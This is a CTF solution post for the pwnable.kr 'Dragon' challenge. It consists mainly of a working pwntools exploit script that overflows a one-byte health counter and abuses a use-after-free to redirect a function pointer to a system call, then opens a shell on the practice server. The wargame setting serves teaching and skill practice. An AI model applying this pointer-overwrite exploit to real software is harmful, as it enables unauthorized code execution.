Pwnable.kr Solve: Dragon

solve.py

#!/usr/bin/python

###################################
# Std imports
import sys

# Third party Imports
from pwn import *

# Binary
BINARY = sys.argv[1]

# Pwntools Binary info
context(os='linux', arch='i386')
r = ROP(BINARY)
e = ELF(BINARY)
l = e.libc

# Connections and interactions
#p = process(BINARY)
p = remote("pwnable.kr", 9004)

# GDB anyone?
#gdb.attach(p)
#input("Ready to roll?")
###################################

'''
Notes:
    - Dragons health is a single byte. Max is 0xff, we could overflow this so we win. (big num becomes smol num)
    - This allows us to then overwrite a previous location using a UAF since we use the same buffer which was freed. 
      - The "name" field becomes the same addr location as the dragon we defeated. 
'''

SHELLCODE  = b""

JUNK = b""

WIN = 0x08048DBF

'''
steps:
    1. kill ourselves.
        - This will malloc player, drag, free drag
    2. Overflow the dragon, defeat dragon, overwrite former dragon with system addr.
    3. Instead of calling PrintPlayerInfo, it will call the system instruction in secretroom.
'''
def die(p):
    p.clean()
    p.sendline("2")
    p.clean()
    p.sendline("1")
    p.clean()
    p.sendline("1")

def overheal(p):
    p.clean()

    # Select a fighter. I select priest because dragon can heal
    p.sendline("1")

    # Steps: Let drag heal twice, then you restore mana. 4 times is how many it takes
    for i in range(4):
        p.sendline("3")
        p.sendline("3")
        p.sendline("2")

    # Overwrite with our desired win condition
    p.clean()
    p.sendline(p32(WIN))

die(p)
overheal(p)
p.interactive()